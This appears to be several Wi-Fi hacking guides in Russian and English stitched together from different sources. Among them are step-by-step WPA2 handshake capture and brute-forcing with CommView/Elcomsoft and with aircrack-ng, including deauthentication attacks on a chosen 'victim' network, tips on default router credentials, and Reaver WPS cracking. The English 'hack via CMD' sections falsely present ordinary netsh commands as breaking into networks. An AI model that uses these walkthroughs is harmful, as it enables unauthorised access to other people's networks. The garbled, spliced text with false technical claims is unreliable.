ВНИМАНИЕ! Данную инструкцию можно использовать только в ознакомительных целях. В некоторых странах взлом Wi-Fi – уголовно наказуемое преступление. Взлом был произведен на примере собственной домашней сети и ни один соседский роутер не пострадал. Статья была создана для обучения будущих работников сетевой безопасности.
Всем привет. Как вы знаете, сейчас почти каждая обычная домашняя сеть использует тип шифрования WPA2-PSK. Данные сети достаточно сложно взломать, но как оказалось это вполне реально. Способ, который я буду использовать не мой, а одного иностранного программиста, занимающегося улучшением безопасности в одной крупной компании. Взлом WiFi будет производиться в операционной системе Windows.
В общем, сегодня мы опробуем его способ, но его нужно использовать только в качестве улучшения своей компьютерной грамотности. Для начала давайте я перечислю, что именно вам понадобится:
- В первую очередь желательно, чтобы система была 64-х битная, так как могут быть проблемы с драйверами. И желательно использовать Windows 7.
- Мы будем использовать перебор, поэтому очень важно вычислительная мощность. Желательно иметь мощную видео карту.
- Нам понадобится средство для взлома или приложение «CommViewWiFi».
- Драйвер для перехвата.
- Рекомендую использовать адаптер ALFA – они имеют широкий диапазон охвата и отлично подходят для взлома.
Ещё один момент, когда будете скачивать программу, обязательно нужно будет установить драйвер для перехвата. Он скачивается оттуда же от куда вы будете качать ПО. Также смотрите на совместимость вашего вай-фай адаптера. Если у вас вообще нет никакого модуля, то вы можете посмотреть совместимые адаптеры на сайте и приобрести его в магазине или заказать через интернет.
Содержание
- Инструкция
- Задать вопрос автору статьи
Инструкция
Вы купили адаптер, установили программу «CommView WiFi». На некоторых модулях устанавливать драйвера не нужно и ПО автоматом настроит вам адаптер. Ещё один совет – если у вас в системе есть ещё один вайфай адаптер, то отключите его, так как работать должен только один. Я бы на вашем месте зашел в «диспетчер устройств» и проверил это.
- После запуска программы вы увидите процесс настройки вашего адаптера.
- Зайдите в настройки и в раздел «Memory Usage». Установите бегунок на максимальное значение. Это нужно, чтобы при переборе использовалось максимальное количество памяти.
- Все необходимые настройки мы выполнили, теперь осталось запустить программку. Для этого находим кнопочку со стрелкой типа «Play» и нажимаем на неё. Если ваш адаптер правильно настроен, то приложение начнем перехватывать трафик, а также в таблице вы увидите информацию о соседских роутерах.
- И так, у нас есть несколько роутеров. Нужно выбрать именно тот, у которого идёт активный трафик, тогда его можно будет попробовать расшифровать. Также смотрите на уровень сигнала, чтобы аппарат был как можно ближе. Таким образом, мы снизим шанс ошибки и помех. Я выбрал аппарат с 4 каналом. Справа выберите «Single channel mode» и выберите нужный канал.
- Перезапустите приложение. Опять нажимаем на поиск трафика.
- Теперь мы видим только нашу жертву. Нажмите на «Инструменты» и далее «Node Reassociation». Откроется вот такое окошко. Выбираем устройство и далее нажимаем «Send Now».
- Теперь мы начали захват пакетов, и вы должны увидеть их список в программе. Наша задача перехватить как можно больше. Один из советов – периодически останавливайте перехват и снова начинайте. Примерное время перехвата: 6-7 минут. После всего нужно сохранить файл – нажимаем на значок дискеты и сохраняем файлик в любое место.
- Файлы перехвачены и сохранены. Теперь их надо расшифровать, для этого нам понадобится программа «Elcomsoft Wireless Security Auditor». Запускаем её и нажимаем «Импорт данных» – «Импортировать лог-файл CommView».
И на этом практически все, дальше запускаем программу и ждем расшифровки. Все зависит от мощности вашего ПК. По умолчанию программа может выбирать как CPU, так и GPU для расшифровки и перебора. Я ставил программу на всю ночь, и она впоследствии работала до обеда. Взламывал я свой роутер и в конце это удалось.
How to Hack Wifi Password using CMD
The internet over the past few years has become an essential part of the average human. There stands no doubt that the internet has vastly reduced the required efforts we need to put on things by providing help on a number of aspects of life. The internet also helps us in connecting each other via mail, media transactions without having to actually visit the other party at their location.
The help internet connectivity provides us today is insurmountable and cannot be matched by anything else. However, some of us are unable to access the internet at times due to personal network issues and end up looking for free Wi-Fi connections available nearby and in the end, find none. All of this boils to an endless disappointment and boredom. However, after a little bit of research, we have come across some amazing Command Prompt tools which help hack Wi-Fi password using Command Prompt on Windows computers. We will discuss these hacks as we go through the article but first let us know what Command Prompt for Windows is and the network security protocols we can hack through it.
What is Command Prompt?
Command Prompt is an application/tool available on every Windows OS based computer. The tool helps the user interact with their operating system by entering Command Prompt commands to fix various system related issues faced by them.
Even though most of the people find Command Prompt rather useless due to its unattractive user interface and most of its command tasks being available as computer shortcuts now, it is still a very useful tool for Windows computers. Not only does Command Prompt help showing detailed information on computer files and software, it also helps people troubleshoot the problems related to them. Today, network related problems are Command Prompt’s main focus. Various commands like FlushDNS, IPConfig, etc are available for troubleshooting network related problems. Surprisingly, Command Prompt also contains a hidden tool which in generating WiFi password using Command Prompt.
Wi-Fi Network Security Protocols
Although hacking Wi-Fi using Command Prompt is available for all the network types, one must keep the network type of their targeted Wi-Fi network in their minds for an easier hacking experience. So let us learn about these Network types.
Wired Equivalency Privacy (WEP)
The creation of Wired Equivalency Privacy or WEP goes back to the 1990s. WEP came up with the idea of creating a safe platform for internet network user by avoiding hackers from snooping onto internet connections. But after a few years, researchers found out that WEP is rather unsafe to use because various methods had then been available to bypass the security strength of the 90s based network security type. However, WEP is still used in a lot of local Wi-Fi networks today but is the easiest of all network types to hack.
Wi-Fi Protected Access (WPA)
In 2003, an interim security program called the Wi-Fi Protected Access or WPA was released by the Wi-Fi Alliance team. WPA basically was an upgrade to the WEP as it added tighter protocols and more network transaction checks to network connections. It also came up with different security modes for personal and enterprise networks. However, despite the upgrades allotted with the WPA, some hackers could still get into the Wi-Fi networks after a while due to WPS, a feature that came along with the release of the WPA system which enabled an easy connection between network devices. Hence, generating Wi-Fi passwords using Command Prompt on WPA systems is not difficult either.
Wi-Fi Protected Access 2 (WPA2)
WPA was only a year old in 2004 and the Wi-Fi Alliance Team already came up with an upgraded Wi-Fi network protocol called the Wi-Fi Protected Access 2 (WPA2). WPA2 is the latest and the highest Wi-Fi security type available in the market right now, however, after applying the command we found out that it is very easy to hack WiFi password using Command Prompt on WPA2 networks as well.
Now that we have learned about the use of Command Prompt and the different types of Wi-Fi security types available today, let us find out how you can use Command Prompt to hack WiFi passwords on your Windows PC.
- Step 1: Open Run on your Windows computer by searching Run on your Windows Start search bar or by pressing the Windows + R keys together.
- Step 2: Type “cmd” on Run and press the Enter key.
- Step 3: Now, once Command Prompt is open, type the command “netsh wlan show network modes=bssid” on it and press Enter. This should now display the Wi-Fi networks available nearby.
- Step 4: Now, choose the Wi-Fi network you want to hack and remember its name properly.
- Step 5: On CMD, type the command: “netsh wlan connect name=<insert Wi-Fi network name here>”. For example: “netsh wlan connect name=dlink” will hack the Wi-Fi network named dlink
- Step 6: Now, you will be connected to the desired Wi-Fi network. To disconnect, type the command “netsh wlan disconnect” on Command Prompt.
Note: This Command Prompt hack does not work on all Wi-Fi networks especially the ones with high-security strength.
Command Prompt Wi-Fi Hack Requirements
Although most of these requirements are installed by default on Windows computers, we have come with a checklist for the users to view and install for an easier Wi-Fi hacking experience.
- An available Wi-Fi network with signal strength higher than 8%.
- A Windows computer with Command Prompt installed.
- NetFrameWork 4.5.
- WinCap
- A dedicated Wi-Fi adapter
Conclusion: How to Hack Wifi Password using CMD
Over the past few years, Command Prompt has not really been the most useful application for Windows PCs. However, some of its commands are still very useful for troubleshooting Windows computer issues. Other than its troubleshooting ability, Command Prompt also allows various hidden tricks like hacking Wi-Fi using Command Prompt which we discussed and much more. However, one must keep in mind that this Command Prompt tool is actually illegal and does not work on all Wi-Fi networks.
There’s lots of people in this world want to know how to hack wifi networks. You must search for CMD and run as administrator. But you need to trick your victim to connect his Wifi to your PC or Laptop. NOTICE: This for education only. Note: Even if the victim has logged you out from the Wifi long time ago you still can hack the password.
Step 1: You Need to Open CMD as Administrator
So CMD can get access to full computer networks and another things
Step 2: Type: color a
So you can see the words and everything in green if you don’t want, skip this step
Step 3: Type: wmic
Step 4: Type: quit
Step 5: Type: netsh wlan show profiles
Select from the networks that you see to hack
Step 6: Type: netsh wlan show profiles (The Name of the Wifi You Selected to Hack)
After this step, you will see security settings in it, you will see security key after you do the step 7 (The last) under it you will see key content in it the password
Step 7: Type: netsh wlan show profiles (The Name of the Wifi You Selected to Hack) key=content
Then, in the security settings under the security key you will see key content, This is the Wifi password
Время на прочтение
3 мин
Количество просмотров 196K
Автор статьи, перевод которой мы сегодня публикуем, хочет рассказать о том, как взломать Wi-Fi-сеть, для защиты которой используются протоколы WPA и WPA2.
Статья написана исключительно в ознакомительных целях
Аппаратное и программное обеспечение
Я буду пользоваться дистрибутивом Kali Linux, установленным на VMware Workstation.
Кроме того, в моём распоряжении имеется Wi-Fi-адаптер Alfa AWUS036NH 2000mW 802.11b/g/n. Вот его основные характеристики:
- Стандарты: IEEE 802.11b/g/n, USB 2.0.
- Скорости передачи данных: 802.11b — 11 Мбит/с, 802.11g — 54 Мбит/с, 802.11n — 150 Мбит/с.
- Разъём для подключения антенны: 1 x RP-SMA.
- Частотные диапазоны: 2412~2462 МГц, 2412~2472 МГц, 2412~2484 МГц.
- Питание: 5В.
- Безопасность: WEP 64/128, поддержка 802.1X, WPS, WPA-PSK, WPA2.
Шаг 1
Нужно запустить Kali Linux в VMware и подключить к системе Wi-Fi-адаптер Alfa AWUS036NH, выполнив следующую последовательность действий:
VM > Removable Devices > Ralink 802.11n USB Wireless Lan Card > Connect
Подключение Wi-Fi-адаптера к ОС, работающей в VMware
Шаг 2
Теперь обратите внимание на средства управления Wi-Fi-подключениями в Kali Linux.
Управление Wi-Fi-подключениями в Kali Linux
Шаг 3
Откройте терминал и выполните команду airmon-ng для вывода сведений об интерфейсах беспроводных сетей.
Вывод сведений об интерфейсах беспроводных сетей
Шаг 4
Как видно, интерфейсу назначено имя wlan0. Зная это, выполним в терминале команду airmon-ng start wlan0. Благодаря этой команде Wi-Fi-адаптер будет переведён в режим мониторинга.
Перевод адаптера в режим мониторинга
Шаг 5
Теперь выполните такую команду: airodump-ng wlan0mon. Это позволит получить сведения о Wi-Fi-сетях, развёрнутых поблизости, о том, какие методы шифрования в них используются, а так же — о SSID.
Сведения о Wi-Fi-сетях
Шаг 6
Теперь воспользуемся такой командой:
airodump-ng -c [channel] –bssid [bssid] -w /root/Desktop/ [monitor interface]
В ней [channel] надо заменить на номер целевого канала, [bssid] — на целевой BSSID, [monitor interface] — на интерфейс мониторинга wlan0mon.
В результате моя команда будет выглядеть так:
airodump-ng -c 6 –bssid 4C:ED:FB:8A:4F:C0 -w /root/Desktop/ wlan0mon
Выполнение команды
Шаг 7
Теперь нужно подождать. Утилита airodump будет мониторить сеть, ожидая момента, когда кто-нибудь к ней подключится. Это даст нам возможность получить handshake-файлы, которые будут сохранены в папке /root/Desktop.
Вот как выглядит работа утилиты до того момента, как кто-то подключился к исследуемой сети.
Программа наблюдает за сетью
А вот что происходит после того, как то-то к сети подключился, и программе удалось получить нужные данные.
Получение необходимых данных
Шаг 8
Вы можете пропустить этот шаг в том случае, если у вас уже есть handshake-файлы. Здесь описан альтернативный способ получения соответствующих данных.
Речь идёт об использовании следующей команды:
aireplay-ng -0 2 -a [router bssid] -c [client bssid] wlan0mon
Здесь [router bssid] нужно заменить на BSSID Wi-Fi-сети, а [client bssid] — на идентификатор рабочей станции.
Эта команда позволяет получить handshake-данные в том случае, если вам не хочется ждать момента чьего-либо подключения к сети. Фактически, эта команда атакует маршрутизатор, выполняя внедрение пакетов. Параметр -0 2 можно заменить другим числом, например, указать тут число 50, или большее число, и дождаться получения handshake-данных
Использование утилиты aireplay-bg
Шаг 9
Теперь воспользуемся такой командой:
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
-a2означает WPA.-b— это BSSID сети.-w— это путь к списку паролей.*.cap— это шаблон имён файлов, содержащих пароли.
В моём случае эта команда выглядит так:
aircrack-ng -a2 -b 4C:ED:FB:8A:4F:C0 -w /root/Desktop/ww.txt /root/Desktop/*.cap
После выполнения этой команды начнётся процесс взлома пароля. Если пароль будет успешно взломан — вы увидите что-то, похожее на следующий скриншот.
Успешный взлом пароля
Как вы контролируете безопасность своих беспроводных сетей?
Наверняка у вас дома есть сеть Wi-Fi. Наверняка у соседей также много подобных сетей, которые отображаются в списке на вашем мобильном устройстве или ноутбуке.
Если рядом с названием сети (SSID) отображается замок, доступ к этой сети защищён паролем. Без пароля или кодовой фразы вы не сможете войти в сеть и выйти в интернет из этой сети.
Быть может, вы забыли пароль от собственной сети. До пандемии можно было пойти в кафе или другое публичное место, получив там доступ к бесплатному Wi-Fi. Можно установить на смартфон приложение вроде WiFi-Map для Android и iOS, получив список доступных поблизости точек доступа с бесплатным Wi-Fi, а также пароли к некоторым закрытым сетям, если другие пользователи предоставили их.
Существуют и другие способы получить доступ к закрытой Wi-Fi сети. Для некоторых из них нужно большое терпение.
Команды Windows для получения ключа
Данный трюк работает для восстановления пароля к сети Wi-Fi, который также называется сетевым ключом безопасности. Этот метод подходит, если вы уже входили в эту сеть Wi-Fi при помощи этого пароля.
В основе этого метода лежит тот факт, что Windows 8 и Windows 10 создают профиль каждой сети Wi-Fi, к которой вы подключались. Если вы говорите операционной системе забыть сеть, пароль пропадает. В таком случае данный трюк не сработает. Однако, мало кто стирает пароли.
Вам потребуется открыть командную строку Windows с правами администратора. Для этого нажмите кнопку «Пуск» и введите в поиск cmd, после чего нажмите на верхний результат правой кнопкой мыши и выберите «Запуск от имени администратора». Далее в самой командной строке наберите следующую команду:
netsh wlan show profile
В результате откроется секция под названием «Профиль пользователя». Здесь находятся все сети Wi-Fi, в которые вы заходили и которые сохраняли. Найдите ту, пароль от которой вам нужен, выделите её и скопируйте. Дальше наберите следующую команду и поменяйте XXXXXXXX на скопированное название сети. Если в названии есть пробелы, оно должно быть в кавычках.
netsh wlan show profile name="XXXXXXXX" key=clear
В полученных данных ищите настройки безопасности и строку Key Content. Там будет отображён нужный вам пароль.
В системе macOS откройте поиск в Spotlight (Cmd+Space) и наберите слово terminal, чтобы открыть местный аналог окна командной строки. Наберите следующую команду, поменяв XXXXX на название сети:
security find-generic-password -wa XXXXX
Сброс маршрутизатора
Этот метод не позволит проникнуть в чужие сети Wi-Fi, так как нужен физический доступ к маршрутизатору. Прежде чем выполнить полный сброс настроек, попытайтесь войти в интерфейс маршрутизатора. После этого можно легко сбрасывать пароль Wi-Fi, если вы его забыли.
Это невозможно, если вы не знаете пароля от самого маршрутизатора. Пароль от сети Wi-Fi и пароль от интерфейса маршрутизатора, как правило разные, если только вы специально не поставили одинаковые. Сброс маршрутизатора работает только тогда, когда у вас есть к нему доступ через Wi-Fi или через кабель Ethernet.
Если маршрутизатор предоставлен вашим интернет-провайдером, проверьте наклейки на нём, прежде чем выполнять сброс. Там может быть напечатан SSID и ключ безопасности сети.
Наиболее радикальным вариантом является использование кнопки сброса (reset), которая есть почти на каждой модели. Надо нажать на неё при помощи скрепки и удерживать около 15 секунд. После этого настройки будут сброшены до заводских.
Когда маршрутизатор сброшен, нужно задать новые логин и пароль для доступа к нему. Это возможно сделать через подключённый Ethernet кабелем компьютер, поскольку подключение Wi-Fi после сброса будет отсутствовать. Доступ осуществляется через браузер, хотя у многих маршрутизаторов и систем mesh есть для этого специальное приложение.
На некоторых маршрутизаторах есть наклейка, где указано название сети по умолчанию (SSID) и пароль. С их помощью можно войти в интерфейс маршрутизатора после сброса его настроек.
В браузере обычно нужно ввести URL-адрес «192.168.1.1» или «192.168.0.1». Чтобы точно узнать, какой из этих адресов используется на подключённом к маршрутизатору через Ethernet компьютере, откройте окно командной строки и введите команду ipconfig.
Ищите строку (IPv4-Адрес), которая начинается с 192.168. Следующая строка (Маска подсети) будет содержать значения от 0 до 255. В последней строке (Основной шлюз) указывает адрес маршрутизатора, это первое устройство в сети.
Наберите в браузере 192.168.X.X, заменив X на найденные в строке (Основной шлюз) значения.
В этот момент маршрутизатор должен запросить логин и пароль. Ещё раз повторим, это не название сети Wi-Fi и пароль к ней. Читайте руководство пользователя от маршрутизатора или перейдите на сайт RouterPasswords. На этом сайте указываются логины и пароли по умолчанию от всех когда-либо созданных маршрутизаторов. Иногда требуется указать модель маршрутизатора.
Часто производители используют в качестве логина слово admin, а в качестве пароля просто password, поэтому вы можете попробовать это сочетание.
Большинство людей опрометчиво не изменяют логины и пароли по умолчанию, поэтому можно попробовать это сочетание даже до того, как вы сбросите настройки маршрутизатора.
Когда вы открыли настройки Wi-Fi в маршрутизаторе, включите беспроводную сеть и задайте сложный пароль. Наверняка вы не захотите делить с соседями доступ к своему интернету.
Можно постараться сделать пароль достаточно простым для набора на мобильном устройстве. Поскольку может быть непросто подключиться к сети Wi-Fi со смартфона, если в пароле есть сложные для набора на сенсорной клавиатуре символы (%*&#@ и т.д.). В таком случае можно немного пожертвовать защитой.
Взлом пароля
Эту статью читают не ради того, чтобы узнать о сбросе маршрутизатора. Интереснее, как взломать пароль от сети Wi-Fi.
Если задать такой вопрос в поисковой системе, вы получите множество ссылок на программы на кишащих вирусами сайтах. Многочисленные видеоролики на YouTube тоже обещают научить взламывать пароли, если вы зайдёте на определённый сайт.
Посещение таких сайтов и тем более скачивание приложений с них является рискованным занятием, поскольку вы можете стать жертвой фишинга, приложений-вымогателей, майнеров и т.д. Если вы решитесь, то лучше заходить на эти сайты с компьютера, который вам не жалко, но в любом случае на нём должен быть установлен антивирус. Антивирусные программы сразу удаляют большинство подобных приложений, прежде чем вы начнёте устанавливать их.
Kali Linux
Лучше использовать специальную операционную систему для подобных взломов. Например, применять двойную загрузку наряду с основной системой. Другая система будет использоваться для тестов на проникновение. Так специалисты изучают сеть на возможные пути взлома. Дистрибутив Kali Linux представляет собой как раз такую систему.
Можно запускать Kali Linux с диска, флешки или виртуальной машины без необходимости установки на компьютер. Дистрибутив бесплатный и у него есть многочисленные инструменты для взлома сети.
Aircrack
Aircrack существует уже много лет, с тех времён, когда за безопасность Wi-Fi отвечал только WEP (Wired Equivalent Privacy). WEP является слабой защитой, поэтому в 2004 году ему на смену пришёл WPA (Wi-Fi Protected Access).
Aircrack-ng описывается как набор инструментов для доступа к механизмам безопасности сети Wi-Fi, поэтому он должен входить в арсенал любого сетевого администратора. Этот набор используется для взлома ключей WEP и WPA-PSK. Он бесплатный и на него есть подробная документация.
Для взлома сети нужен правильный адаптер Wi-Fi в компьютере, который поддерживает внедрение пакетов. Вы должны уметь работать с командной строкой и иметь немало терпения. Ваш адаптер Wi-Fi и Aircrack должны собрать множество данных, чтобы суметь расшифровать ключ сети.
wi-fi адаптер
Можно использовать Aircrack с установкой на Kali Linux или задействовать его для обеспечения безопасности вашей сети. Похожим вариантом для персональных компьютеров является Airgeddon.
Reaver-wps
Для взлома значительно более сложных паролей и кодовых фраз WPA/WPA2 придётся приложить ещё больше усилий. Reaver-wps представляет собой один из инструментов, способных справиться с такой задачей. Снова нужно уметь работать с командной строкой. На взлом можно уйти от 2 до 10 часов. Пароль сработает только в том случае, если у маршрутизатора сильный сигнал и включена защита WPS (Wi-Fi Protected Setup).
WPS представляет собой кнопку на корпусе маршрутизатора. Ещё нужно нажать кнопку на устройстве с Wi-Fi, после чего они обнаружат друг друга и автоматически установят зашифрованное соединение. Через эту лазейку и действует Reaver.
Даже если выключить WPS, иногда механизм отключается не полностью. В любом случае, необходимо отключать эту функцию, если вы опасаетесь взлома. Или пользуйте маршрутизатор, который вообще не поддерживает WPS.
Взлом Wi-Fi через WPS возможен при помощи некоторых инструментов на Android, но только если там был выполнен рут. В качестве вариантов можно назвать Wifi WPS WPA Tester, Reaver for Android, Kali Nethunter.
TrashExpert Staff
Над статьей работал не только один автор, но и другие члены команды TrashExpert: администратор, редакторы или коллектив авторов.